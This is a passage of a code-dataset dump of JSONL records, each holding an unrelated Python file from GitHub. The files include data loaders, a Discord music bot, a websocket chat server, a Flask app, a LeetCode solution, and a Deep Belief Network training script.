np arrays: (X, y, X_test, y_test)\n \"\"\"\n loader = MusicGenreSubsetLoader(\n self.datadir,\n repeat=repeat\n )\n\n if balanced:\n ids, X, y = loader.load_bal()\n else:\n ids, X, y = loader.load_unbal()\n\n ids, X, y = tensor_to_numpy(ids, X, y)\n X = flatten_features(X)\n\n ids_test, X_test, y_test = loader.load_eval()\n _, X_test, y_test = tensor_to_numpy(ids_test, X_test, y_test)\n X_test = flatten_features(X_test)\n\n logging.info('Training dataset X shape: %s', X.shape)\n logging.info('Training dataset y shape: %s', y.shape)\n\n return X, y, X_test, y_test\n\n\nclass TFMusicGenreSetLoader(DatasetLoader):\n \"\"\"\n Loads data set as tensorflow tensors\n \"\"\"\n\n def __init__(self, datadir):\n self.datadir = datadir\n\n def load(\n self,\n batch_size,\n balanced=False,\n repeat=False) -> Tuple[tf.Tensor, tf.Tensor, np.array, np.array]:\n \"\"\"\n Returns a tuple including train and test (X, y, X_test, y_test)\n Train set is loaded as TF Tensors\n Test set is loaded as np arrays\n \"\"\"\n loader = MusicGenreSubsetLoader(\n self.datadir,\n repeat=True,\n batch_size=batch_size\n )\n\n if balanced:\n ids, X, y = loader.load_bal()\n else:\n ids, X, y = loader.load_unbal()\n\n test_loader = MusicGenreSubsetLoader(\n self.datadir,\n repeat=False,\n batch_size=2500\n )\n ids_test, X_test, y_test = test_loader.load_eval()\n ids_test, X_test, y_test = tensor_to_numpy(ids_test, X_test, y_test)\n\n return X, y, X_test, y_test\n","repo_name":"jramcast/music-genre-classification-audioset","sub_path":"mgc/dataloading.py","file_name":"dataloading.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"74162001125","text":"#Function Create Table\ndef createBoard():\n lst_1=['7','8','9']\n lst_2=['4','5','6']\n lst_3=['1','2','3']\n global matrix \n matrix = [lst_1,lst_2,lst_3]\n\n return matrix\n\ndef PrintBoard():\n for num in matrix:\n print(num)\n\ndef Input():\n global position\n global marker\n position = input(\"Please enter a number for the borad code:\")\n marker = input(\"Please enter a X or O for the borad:\")\n return position,marker\n \ncreateBoard()\nPrintBoard()\nInput()\n","repo_name":"khemmathat14/TictactocPython","sub_path":"TicTacToc.py","file_name":"TicTacToc.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29886162218","text":"import discord\nimport wavelink\nfrom wavelink import websocket\nfrom discord.ext import commands\n\nfrom Secrect import Secret\n\nclass Music(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n if not hasattr(bot, 'wavelink'):\n self.bot.wavelink = wavelink.Client(bot=self.bot)\n\n self.bot.loop.create_task(self.start_nodes())\n\n async def start_nodes(self):\n await self.bot.wait_until_ready()\n\n # Initiate our nodes. For this example we will use one server.\n # Region should be a discord.py guild.region e.g sydney or us_central (Though this is not technically required)\n await self.bot.wavelink.initiate_node(host='127.0.0.1',\n port=8000,\n rest_uri='http://127.0.0.1:8000',\n password='youshallnotpass',\n identifier='Naruuto',\n region='us_central')\n\n @commands.command()\n async def connect_(self, ctx, *, channel: discord.VoiceChannel = None):\n if not channel:\n try:\n channel = ctx.author.voice.channel\n except AttributeError:\n raise discord.DiscordException('No channel to join. 
Please either specify a valid channel or join one.')\n\n        player = self.bot.wavelink.get_player(ctx.guild.id)\n        await ctx.send(f'Connecting to **`{channel.name}`**')\n        await player.connect(channel.id)\n\n    @commands.command()\n    async def play(self, ctx, *, query: str):\n        tracks = await self.bot.wavelink.get_tracks(f'ytsearch:{query}')\n\n        if not tracks:\n            return await ctx.send('Could not find any songs with that query.')\n\n        player = self.bot.wavelink.get_player(ctx.guild.id)\n        if not player.is_connected:\n            await ctx.invoke(self.connect_)\n\n        await ctx.send(f'Added {str(tracks[0])} to the queue.')\n        await player.play(tracks[0])\n\ndef setup(client):\n    client.add_cog(Music(client))\n","repo_name":"Gabriel-bits/Bot_Discord","sub_path":"tests/musi.py","file_name":"musi.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"41255909807","text":"# 906. Super Palindromes\n\nclass Solution(object):\n    \n    # strategy: check between sq_l and sq_r\n    # 10^9 is the length of the range - still not trivial\n    # only look at palindromes in that range - 10^5 nums - since the other half of the number is fixed\n    # Finally check if the square is also a palindrome\n    \n    def superpalindromesInRange(self, L, R):\n        L = int(L)\n        R = int(R)\n        \n        count = 0\n        \n        UPPERLIMIT = 100000\n        \n        # check all nos between 0 and UPPERLIMIT\n        \n        for x in range(UPPERLIMIT):\n            s = str(x)\n            p1 = int(s + s[::-1])\n            p2 = int(s if len(s) == 0 else s + s[-2::-1])\n            \n            n1 = p1 ** 2\n            n2 = p2 ** 2\n            \n            if L <= n1 and n1 <= R:\n                if is_palindrome(n1):\n                    print(n1)\n                    count += 1\n            \n            if L <= n2 and n2 <= R:\n                if is_palindrome(n2):\n                    print(n2)\n                    count += 1\n        \n        return count\n    \n# checks if a number is a palindrome\ndef is_palindrome(n):\n    return str(n) == str(n)[::-1]\n    \n","repo_name":"MahirJhaveri/CompetitiveProgramming","sub_path":"LeetCode/Problem-906.py","file_name":"Problem-906.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"10441093717","text":"import io\nfrom zipfile import ZipFile\n\nimport boto3\nimport pandas as pd\n\n\ndef get_data(\n    bucket_name='xxx', \n    key='yyy.zip'):\n    s3 = boto3.client('s3')\n    response = s3.get_object(Bucket=bucket_name, Key=key)\n    file_content = response['Body'].read()\n    zip_file = ZipFile(io.BytesIO(file_content))\n    return pd.read_csv(zip_file.open(zip_file.infolist()[0]))\n\n# The provided code is a function that retrieves CSV data from inside a ZIP file on Amazon S3 and loads it into a pandas DataFrame. The main steps inside the function and their roles are explained below:\n# bucket_name and key parameters:\n# The bucket_name parameter specifies the name of the Amazon S3 bucket where the data is stored.\n# The key parameter specifies the S3 key (file path) of the ZIP file to retrieve.\n\n# Initializing the boto3 client:\n# The boto3 library is used to establish a connection to the Amazon S3 service.\n\n# Retrieving the S3 object:\n# The s3.get_object() method is used to fetch the object with the specified key from the specified bucket.\n\n# Reading the file content:\n# The contents of the ZIP file are read from the retrieved object as a byte string.\n\n# Converting the byte string into a Zip file:\n# The byte string that was read is converted into a Zip file using io.BytesIO.\n\n# Reading the CSV file inside the Zip file:\n# The ZipFile class is used to get the CSV file inside the Zip file and load it into a pandas DataFrame.\n# zip_file.infolist()[0] selects the first file inside the Zip file. Other files can be specified as needed.\n\n# Returning the DataFrame:\n# The loaded CSV data is returned as a pandas DataFrame.\n \n# By calling this function, you can retrieve the CSV data from the specified ZIP file in the specified S3 bucket and use it as a DataFrame. This is convenient for data preprocessing and analysis.\n# Note that the bucket_name and key parameters must be set to the actual S3 bucket and file path.\n","repo_name":"ChanhiYasutomi/Code_For_DataAnalysis_For_Python","sub_path":"def 
get_data.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70503011045","text":"from flask import Flask, jsonify, request\nfrom flask_cors import CORS\nfrom src.build import build\n\nfrom src.dbutils import Database\n\napp = Flask(__name__)\ncors = CORS(app)\n\n@app.route('/', methods=['GET'])\ndef home():\n response = jsonify(\"Hello World\")\n response.headers.add('Access-Control-Allow-Origin', '*')\n return response\n\n\n\n\nif __name__ == '__main__':\n build(app)\n app.run(host=\"0.0.0.0\", port=8080, debug=True, threaded=True)","repo_name":"lbarto12/python-course-webapp","sub_path":"backend/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12336118022","text":"import warnings\r\nwarnings.simplefilter('ignore', UserWarning)\r\n\r\nimport os\r\nimport cv2\r\nimport torch\r\nimport mmcv\r\nfrom mmtrack.apis import inference_sot, init_model\r\nfrom mim.commands.download import download\r\n\r\nfrom argparse import ArgumentParser\r\nparser = ArgumentParser()\r\nparser.add_argument('--video', type=str, default='video', help='video file name')\r\nparser.add_argument('--skip', type=int, default=1, help='skip')\r\nparser.add_argument('--mergin', type=int, default=0, help='mergin')\r\nargs = parser.parse_args()\r\n\r\nvideo_fname = args.video\r\nsave_fname = os.path.splitext(os.path.basename(video_fname))[0]\r\nskip = args.skip\r\nmergin = args.mergin\r\n\r\ndef tracking():\r\n \r\n os.makedirs(save_fname, exist_ok=True)\r\n\r\n # load model\r\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\r\n os.makedirs('models', exist_ok=True)\r\n checkpoint_name = 'siamese_rpn_r50_20e_lasot'\r\n checkpoint = download(package='mmtrack', configs=[checkpoint_name], dest_root=\"models\")[0]\r\n model = init_model(os.path.join('models', checkpoint_name + '.py'), os.path.join('models', checkpoint), device=device)\r\n\r\n # tracking\r\n frames = mmcv.VideoReader(video_fname)\r\n \r\n h = frames.height\r\n w = frames.width\r\n\r\n source_window = \"draw_rectangle\"\r\n cv2.namedWindow(source_window)\r\n rect = cv2.selectROI(source_window, frames[0], False, False)\r\n # rect:(x1, y1, w, h)\r\n # convert (x1, y1, w, h) to (x1, y1, x2, y2)\r\n rect_convert = (rect[0], rect[1], rect[0]+rect[2], rect[1]+rect[3])\r\n cv2.destroyAllWindows()\r\n\r\n for frame_index, frame in enumerate(frames):\r\n result = inference_sot(model, frame, rect_convert, frame_id=frame_index)\r\n if frame_index % skip == 0:\r\n bbox = result['track_bboxes']\r\n # bbox:(x1, y1, x2, y2)\r\n center_x = int((bbox[0] + bbox[2]) / 2)\r\n center_y = int((bbox[1] + bbox[3]) / 2)\r\n rect_width = bbox[2] - bbox[0]\r\n rect_height = bbox[3] - bbox[1]\r\n square_width = max(rect_width, rect_height)\r\n square_width_half = int(square_width / 2)\r\n\r\n new_x1 = center_x - square_width_half - mergin\r\n new_x2 = center_x + square_width_half + mergin\r\n new_y1 = center_y - square_width_half - mergin\r\n new_y2 = center_y + square_width_half + mergin\r\n\r\n if new_x1 >= 0 and new_x2 <= w and new_y1 >= 0 and new_y2 <= h:\r\n\r\n filename = f'{save_fname}_{frame_index}.png'\r\n trim_image = frame[new_y1:new_y2, new_x1:new_x2, :]\r\n cv2.imwrite(os.path.join(save_fname, filename), trim_image) \r\n\r\nif __name__ == '__main__':\r\n tracking()\r\n 
\r\n","repo_name":"dai-ichiro/enjoyDiffusers","sub_path":"trim_square.py","file_name":"trim_square.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"13859209559","text":"from django.urls import re_path, path, include\nfrom . import views\n\nurlpatterns = [\n path('', views.hello_response),\n path('redirect/', views.http_redirect),\n path('fun1', views.fun1),\n path('render-html/', views.render_html),\n path('render-template/', include([\n path('', views.render_template),\n path('form-handler/', views.form_handler),\n ])),\n path('render-to-response', views.func_render_to_response),\n]\n","repo_name":"zinpy/courses_django","sub_path":"lesson_two_response/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11065687599","text":"import numpy as np\nimport pandas as pd\nfrom itertools import combinations\n\nDTYPES = dict(\n stat=\"O\",\n sample=\"O\",\n value=np.int64,\n barcode=\"O\",\n reads=np.int64,\n score=np.int64,\n)\n\nnucleotides = \"ACGTN\"\n\n\ndef isTransition(pair_set):\n return pair_set == {\"A\", \"G\"} or pair_set == {\"C\", \"T\"}\n\n\nmutation_categories = {\n pair: \"transition\" if isTransition(set(pair)) else \"transversion\"\n for pair in combinations(nucleotides[:-1], 2)\n}\n\n_extra_categories = {\"N\": \"read mismatch\", \"Ins\": \"Insertion\", \"Del\": \"Deletion\"}\n\nmutation_categories.update(\n {\n (nucleotide, annotation): mut_category\n for annotation, mut_category in _extra_categories.items()\n for nucleotide in nucleotides\n }\n)\n\nmutation_categories.update(\n {(pair[1], pair[0]): category for pair, category in mutation_categories.items()} #\n) # Make Symmetric\nmutation_categories = pd.Series(mutation_categories, name=\"category\")\nmutation_categories.index.names = [\"From\", \"To\"]\n\nmutation_categories = mutation_categories.loc[\n list(nucleotides) + [\"Ins\"], list(nucleotides) + [\"Del\"]\n]\n\n\ndef barcode_content(barcodes):\n return pd.concat(\n {nuc: barcodes.str.count(nuc) for nuc in nucleotides}, names=[\"content\"], axis=1\n )\n\n\ndef delta_content_constructor(row):\n change = {nuc: 0 for nuc in nucleotides}\n if row[\"From\"] != \"Ins\":\n change[row[\"From\"]] = -1\n if row[\"To\"] != \"Del\":\n change[row[\"To\"]] = +1\n return pd.Series(change)\n\n\ndelta_content_map = mutation_categories.reset_index().apply(\n delta_content_constructor, axis=1\n)\ndelta_content_map.index = mutation_categories.index\n\n\ndef annotate_mutations(barcodes):\n from_barcodes = barcodes[\"From\"]\n to_barcodes = barcodes[\"To\"]\n d_content = barcode_content(to_barcodes) - barcode_content(from_barcodes)\n annotations = pd.DataFrame(\n dict(From=d_content.idxmin(axis=1), To=d_content.idxmax(axis=1))\n )\n d_nucleotides = d_content.sum(axis=1)\n insertions = d_nucleotides == +1\n deletions = d_nucleotides == -1\n annotations.loc[insertions, \"From\"] = \"Ins\"\n annotations.loc[deletions, \"To\"] = \"Del\"\n return annotations\n","repo_name":"cancerevo/AmpliconPE","sub_path":"src/AmpliconPE/shared.py","file_name":"shared.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14421101957","text":"\"\"\"\n This is the solution of a student from last quarter named Mark O'Grady.\n This program merges N dictionaries into a single 
dictionary. If a given\n    key exists in more than one of the original dictionaries, that key appears\n    once in the merged dictionary and is mapped to a list containing ALL values\n    that correspond to it from the original dictionaries.\n\"\"\"\n\n# original dictionaries\naddressBook = {'mary':'123 Main St.', 'devon':'3429 Cypress Dr.', 'erin':'9231 Sycamore Pl.', 'paul':'1332 Columbine Dr.', 'john':'4547 Reyes Dr.'}\ncityState = {'john':'Palo Alto, CA'}\ncounty = {}\nphoneBook = {'erin':'(408) 250-4501', 'eric':'(886) 792-3847', 'devon':'(409) 345-1919', 'mary':'(972) 345-2239', 'john':'(650) 982-8732'}\nemail = {'mary':'mary.meyer@yopmail.com', 'david':'davidm@yopmail.com', 'john':'jsmith@maildrop.cc'}\n\n# merged dictionary\ndb = dict(addressBook) # start with a copy of the first dictionary so the original is not mutated\n\n# populate database\nfor d in (cityState, county, phoneBook, email):\n    for key, value in d.items():\n        if key not in db: # if key not in db, insert key/value into db.\n            db [key] = value\n        elif type(db[key]) is not list: # if key exists and value not list, create list with existing value and new value.\n            db [key] = ([db[key], value])\n        else: # key exists and value is already a list, so append to the entry db.\n            db [key].append(value)\n\nif __name__ == \"__main__\":\n    print ('============================== TESTING SECTION ==============================')\n\n    print ('Display Original Dictionaries:\\n')\n    print ('addressBook = %s' % addressBook)\n    print ('cityState = %s' % cityState)\n    print ('county = %s' % county)\n    print ('phoneBook = %s' % phoneBook)\n    print ('email = %s' % email)\n\n\n    print ('\\n\\n\\nDisplay New Merged Dictionary (db): \\n')\n    print ('db = %s' % db)\n\n\n\n\n","repo_name":"tmcmilla/fhpython101","sub_path":"Examples/dictionaryMerge.py","file_name":"dictionaryMerge.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1196276480","text":"from fastapi import APIRouter, Depends, HTTPException, Response, status\nfrom .. 
import schemas, database, models, oauth2\nfrom sqlalchemy.orm import Session\n\n\nrouter = APIRouter(prefix=\"/vote\", tags=[\"Vote\"])\n\n\n@router.post(\"/\", status_code=status.HTTP_201_CREATED)\nasync def vote(\n vote: schemas.Vote,\n db: Session = Depends(database.get_db),\n current_user: schemas.UserOut = Depends(oauth2.get_current_user),\n):\n print(vote)\n # print(current_user)\n post = db.query(models.Post).filter(models.Post.id == vote.post_id).first()\n # print(post)\n # print(vote)\n # print(current_user)\n\n if not post:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"post with id {vote.post_id} not found\",\n )\n\n vote_query = db.query(models.Vote).filter(\n models.Vote.post_id == vote.post_id, models.Vote.user_id == current_user.id\n )\n\n found_vote = vote_query.first()\n\n if vote.dir == 1:\n if found_vote:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST, detail=f\"vote already exists\"\n )\n new_vote = models.Vote(user_id=current_user.id, post_id=vote.post_id)\n db.add(new_vote)\n db.commit()\n\n return {\"detail\": \"vote created\"}\n else:\n if not found_vote:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST, detail=f\"vote not found\"\n )\n db.delete(found_vote)\n db.commit()\n return {\"detail\": \"vote deleted\"}\n","repo_name":"GaikwadSandesh/fastapi_tutorial","sub_path":"app/routers/vote.py","file_name":"vote.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5228226196","text":"# x = 10 + 4 * 4 / 2\n# print(x)\n\n# strings_ = [str(x) for x in input(\"Please input at least 5 words (Use Space): \").split()]\n#\n# for index,item in enumerate(strings_):\n#\n# def recursion_reverse(string_1):\n# if not string_1:\n# return \"\"\n# else:\n# front_part=recursion_reverse(string_1[1:])\n# back_part=string_1[0]\n#\n#\n#\n# return front_part+back_part[0]\n#\n# strings_[index]=recursion_reverse(item)\n#\n# print(strings_)\n\ndef display_data(data):\n for result in data:\n count = ''\n while result > 0:\n count += '*'\n result -= 1\n print(count)\ndisplay_data([2,3,4,3])\n","repo_name":"WaiLynnHtut/Code-Test","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20381020411","text":"#!/usr/bin/env python\n\nimport asyncio\nimport json\nimport logging\nimport websockets\n\nlogging.basicConfig()\n\nSTATE = {\"value\": 0}\n\n# Contains each room name as a key + the appertaining\n# sessions as a value\nROOMS = {\n}\n\n# Contains a mapping from session ==> user\nUSER_SESSIONS = {\n}\n\n# Contains the session as a key and the room name as a value\nSESSION_ROOMS = {}\n\ndef state_event():\n return json.dumps({\"type\": \"state\", **STATE})\n\ndef message_event(message, user_name):\n return json.dumps({\"type\": 3, \"message\": message, \"from\": user_name})\n\ndef users_event(room_name):\n return json.dumps({\"type\": 2, \"users\": [USER_SESSIONS[session] for session in ROOMS[room_name]]})\n\ndef available_rooms_event():\n return json.dumps({\"type\": 1, \"rooms\": [key for key in ROOMS.keys()]})\n\ndef add_user_to_room(user_name, room_name, session):\n if room_name in ROOMS:\n # Add new session to room\n ROOMS[room_name].add(session)\n # Add mapping between session and room\n SESSION_ROOMS[session] = room_name\n # Add mapping between session and username\n USER_SESSIONS[session] = 
user_name\n\ndef remove_user(session):\n room = SESSION_ROOMS[session]\n # Remove session from room\n ROOMS[room].remove(session)\n # Remove mapping between session and name\n del USER_SESSIONS[session]\n # Remove mapping between session and room\n del SESSION_ROOMS[session]\n return room\n\ndef send_message_to_room(room_name, message):\n print(\"Sending message '\" + message + \"' to room \" + room_name)\n websockets.broadcast(ROOMS[room_name], message)\n\nasync def handler(websocket, path):\n try:\n # at first, we add each user to the default room\n await websocket.send(available_rooms_event())\n # Manage state changes\n async for message in websocket:\n data = json.loads(message)\n # User Join message\n if data[\"type\"] == 1:\n payload = data[\"data\"]\n user_name = payload[\"userName\"]\n room_name = payload[\"roomName\"]\n\n # room wasn't present --> create + send update\n if not room_name in ROOMS:\n # create new room\n ROOMS[room_name] = set()\n await websocket.send(available_rooms_event())\n\n # Add new user to room\n add_user_to_room(user_name, room_name, websocket)\n send_message_to_room(room_name, users_event(room_name)) # Broadcast join in this room\n pass\n elif data[\"type\"] == 2:\n payload = data[\"data\"]\n message = payload[\"message\"]\n send_message_to_room(SESSION_ROOMS[websocket], message_event(message, USER_SESSIONS[websocket]))\n pass\n finally:\n # Unregister user\n room_name = remove_user(websocket)\n send_message_to_room(room_name, users_event(room_name)) # Broadcast join in this room\n\n\nasync def main():\n async with websockets.serve(handler, \"0.0.0.0\", 6789):\n await asyncio.Future() # run forever\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"elitru/NVSV-Python-Chat","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72103740324","text":"import torch\nfrom torch.autograd.function import InplaceFunction\nfrom itertools import repeat\nimport numpy as np\nfrom collections import Counter\n\n\ndef count_top_K_grid(arr, K=3):\n c = Counter(arr)\n c_sort = sorted(c.items(), key=lambda x:x[1])\n top_K_grid = [c_sort[-i][0] for i in range(1, K+1)]\n return top_K_grid\n\n\ndef replace_arr_by_count(arr, M=10):\n c = Counter(arr)\n aux_c = np.zeros(M)\n aux_c[list(c.keys())] = list(c.values())\n arr_r = aux_c[arr]\n return arr_r\n\n\nclass Parallel_Dropout(InplaceFunction):\n \n @staticmethod\n def _make_noise(con_fc):\n return con_fc.new().resize_as_(con_fc)\n\n @classmethod\n def forward(cls, ctx, con_fc, K=3, M=10, alpha=0.9, beta=0.1, train=False, inplace=False):\n ctx.train = train\n ctx.inplace = inplace\n \n if not ctx.train:\n return con_fc\n\n if ctx.inplace:\n ctx.mark_dirty(con_fc)\n output = con_fc\n else: \n output = con_fc.clone()\n\n con_fc = con_fc.detach().cpu().numpy()\n \n max_con = np.max(con_fc, axis=1, keepdims=True)\n min_con = np.min(con_fc, axis=1, keepdims=True)\n\n con_feat_dif = np.floor((con_fc - min_con) * M / (max_con - min_con)).astype(int)\n con_feat_dif[con_feat_dif==M] = M -1\n top_K_inx = np.apply_along_axis(count_top_K_grid, 1, con_feat_dif)\n \n feat_dif_list = np.split(con_feat_dif, K, axis=1)\n\n fc_sample_pb = []\n \n for i in range(K):\n \n fc_i_feat_dif = feat_dif_list[i]\n fc_i_p_mask = fc_i_feat_dif == top_K_inx[:,i].reshape(-1,1)\n fc_i_non_mask = fc_i_feat_dif != top_K_inx[:,i].reshape(-1,1)\n\n fc_i_r = np.apply_along_axis(replace_arr_by_count, 
1, fc_i_feat_dif)\n            fc_i_p = beta * (1 - (fc_i_r / fc_i_r.shape[1])) * fc_i_non_mask\n            fc_i_p[fc_i_p_mask] = alpha\n\n            fc_i_sample_pb = torch.FloatTensor(np.random.binomial(1, fc_i_p, fc_i_p.shape))\n            fc_sample_pb.append(fc_i_sample_pb)\n\n        ctx.noise = torch.cat(fc_sample_pb, dim=1).cuda()\n        output.mul_(ctx.noise)\n\n        return output\n\n\n    @staticmethod\n    def backward(ctx, grad_output):\n        if ctx.train:\n            return grad_output * ctx.noise, None, None, None, None, None, None, None\n        else:\n            return grad_output, None, None, None, None, None, None, None\n\n\n\n\n\n\n\n    \n","repo_name":"ALIS-Lab/AAAI2021-PDD","sub_path":"networks/parallel_dropout.py","file_name":"parallel_dropout.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"40367741754","text":"import RPi.GPIO as GPIO\nfrom time import sleep\nfrom SBW import LED\nfrom SBW import Conditions\nfrom Klavesnice import Klavesnice\n#from Teplomer import Teplomer\nfrom Klavesnice2 import AutomatickaKlavesnice\nfrom Bzucak import Noise\nfrom RGB import RGBLED\n\nGPIO.setmode(GPIO.BCM)\n\nclass Hlavni_kod():\n\n    def __init__(self):\n        self.led = LED()\n        self.podminky = Conditions()\n        self.noise = Noise()\n        self.klavesnice = Klavesnice()\n#        self.teplomer = Teplomer()\n        self.automatickaKlavesnice = AutomatickaKlavesnice()\n        self.rgb = RGBLED()\n\n    def vyberProgramu(self):\n        textMenu = \"\"\"Welcome to the menu:\\n \n        1) Thermometer - DISCONNECTED\n        2) Blink\n        3) Buzzer\n        4) Free ride\\n\n        5) Exit\\n\"\"\"\n\n        coChceme = int((input(textMenu)))\n\n        if coChceme == 1:\n            pass\n#            self.teplomer.read_temp_print()\n        elif coChceme == 2:\n            self.podminky.blickniBG()\n        elif coChceme == 3:\n            vlozeneCislo = int(input(\"Please enter the number of repetitions: \"))\n            self.noise.bzucakOpakovani(vlozeneCislo)\n        elif coChceme == 4:\n            self.rgb.bilaRGB_BLICK()\n\n        # ------ EXIT -----\n        elif coChceme == 5:\n            GPIO.cleanup()\n            exit()\n        else:\n            print(\"Please choose from the menu\")\n\nwhile True:\n    try:\n        program = Hlavni_kod()\n        program.vyberProgramu()\n\n    except KeyboardInterrupt:\n        GPIO.cleanup()","repo_name":"PetrPatera/Raspberry","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74855671525","text":"from sys import platform\n\nif platform == \"linux\" or platform == \"linux2\":\n    # linux\n    pass\nelif platform == \"darwin\":\n    # OS X\n    import caffeine\nelif platform == \"win32\":\n    # Windows...\n    pass\n\nimport os, timeit, traceback\nimport numpy as np\n\nimport data\nimport utils\nfrom models.dbn import DBN\n\n__docformat__ = 'restructuredtext en'\n\n__doc__ = \"\"\"\nThis code trains a Deep Belief Network on the weather data\n\nData Set:\n    - 582 events\n    - 10092 features\n    - binary result of TRUE|FALSE\n\nThe features are unknown preprocessed weather data and the result corresponds to an ice-storm event\n\"\"\"\n\n# Save locations\n## built model\nMODEL = data.model_dir\nMODEL_ID = os.path.splitext(os.path.basename(__file__))[0]\n\n## visualising runtime parameters\nDATA_DIR = data.data_dir\nPLOT_DIR = data.plot_dir\n\n# remove existing files\nos.system('rm {}_*'.format(os.path.join(DATA_DIR, '', MODEL_ID)))\n\n# network parameters\nn_ins = 10092\nhidden_layer_sizes = [5000, 2500, 1000]\nn_outs = 2\n\n# pre-training\nk = 15 # number of Gibbs steps in CD/PCD\npretraining_epochs = 100\npretrain_lr = 0.01\n\n# training (fine-tuning)\nfinetune_lr = 
0.1\ntraining_epochs = 1000\nbatch_size = 10\n\n# early-stopping parameters\npatience = 20000 # look as this many examples regardless\npatience_increase = 2 # wait this much longer if new best found\nimprovement_threshold = 0.995 # consider this improvement significant\npretrain_vis_freq = False\nfinetrain_vis_freq = False\n\nif __name__ == '__main__':\n \n logger = utils.logs.get_logger(__name__,\n update_stream_level=utils.logs.logging.DEBUG)\n logger.info('Loading data ...')\n source = data.Load_Data(location=data.data_loc)\n \n datasets = source.all()\n train_set_x, train_set_y = datasets[0]\n valid_set_x, valid_set_y = datasets[1]\n test_set_x, test_set_y = datasets[2]\n \n # compute number of minibatches for training, validation and testing\n n_train_batches = train_set_x.get_value(borrow=True).shape[0]// batch_size\n n_valid_batches = valid_set_x.get_value(borrow=True).shape[0]// batch_size\n n_test_batches = test_set_x.get_value(borrow=True).shape[0] // batch_size\n \n # np random generator\n np_rng = np.random.RandomState(123)\n \n logger.info('Building the model ...')\n # construct the Deep Belief Network\n dbn = DBN(\n np_rng=np_rng,\n n_ins=n_ins,\n hidden_layers_sizes=hidden_layer_sizes,\n n_outs=n_outs\n )\n \n logger.debug('building pre-training functions')\n pretraining_fns = dbn.pretrainingFunctions(train_set_x=train_set_x,\n batch_size=batch_size,\n k=k)\n \n # visualise arbitrary parameters at runtime\n visualise_params = {}\n \n # visualise cost during runtime\n visualise_cost = { # visualising the cost\n 'cost':{'freq':pretrain_vis_freq} # frequency of sampling\n }\n \n # Visualise these items during training\n visualise_weights = {\n 'inputLayer' + '_weights': {\n 'x':dbn.sigmoid_layers[0].w,\n 'img_shape':(29*2, 29*2*3),\n 'tile_shape':(25, 40),\n 'tile_spacing':(1, 1),\n 'freq':pretrain_vis_freq,\n 'runtime_plots':True\n }\n }\n \n param_man = utils.visualise.Visualise_Runtime(\n plot_dir=PLOT_DIR,\n data_dir=DATA_DIR\n )\n param_man.initalise(\n run_id = MODEL_ID,\n imgs = visualise_weights,\n default_freq = n_train_batches//2,\n cost = visualise_cost\n )\n \n logger.info('Pre-training the model ...')\n start_time = timeit.default_timer()\n \n param_man.getValues(\n i = -1, # -1 because print at (i+1) % freq\n cost = np.nan,\n # fill with np.nan for each update that is expected\n updates = [np.nan]*len(param_man.updates.keys()))\n param_man.writeRuntimeValues(i = -1, clean_files = True)\n \n for l in range(dbn.n_layers): # Pre-train layer-wise\n # Allows a bored person to quit the run\n # without losing everything!\n try: # control+c doesn't loose everything!\n logger.debug('Pre-training layer: {}'.format(l))\n layer_start = timeit.default_timer()\n \n # this particular section pull parameters from the RBM\n # as the RBM is used for pretraining the Hidden Layers\n new_params = {\n 'hiddenLayerRBM{:02d}'.format(l) + '_weights': {\n 'x': dbn.rbm_layers[l].w,\n 'freq':pretrain_vis_freq,\n },\n 'hiddenLayerRBM{:02d}'.format(l) + '_hbias': {\n 'x': dbn.rbm_layers[l].hbias,\n 'freq':pretrain_vis_freq,\n },\n 'hiddenLayerRBM{:02d}'.format(l) + '_vbias': {\n 'x': dbn.rbm_layers[l].vbias,\n 'freq':pretrain_vis_freq,\n }\n }\n \n # the update_position is fixed because we delete \n # the current dict at end of loop\n visualise_updates = {\n 'hiddenLayerRBM{:02d}'.format(l) + '_weights': {\n 'update_position':0,\n 'freq':pretrain_vis_freq\n },\n 'hiddenLayerRBM{:02d}'.format(l) + '_hbias': {\n 'update_position':1,\n 'freq':pretrain_vis_freq\n },\n 
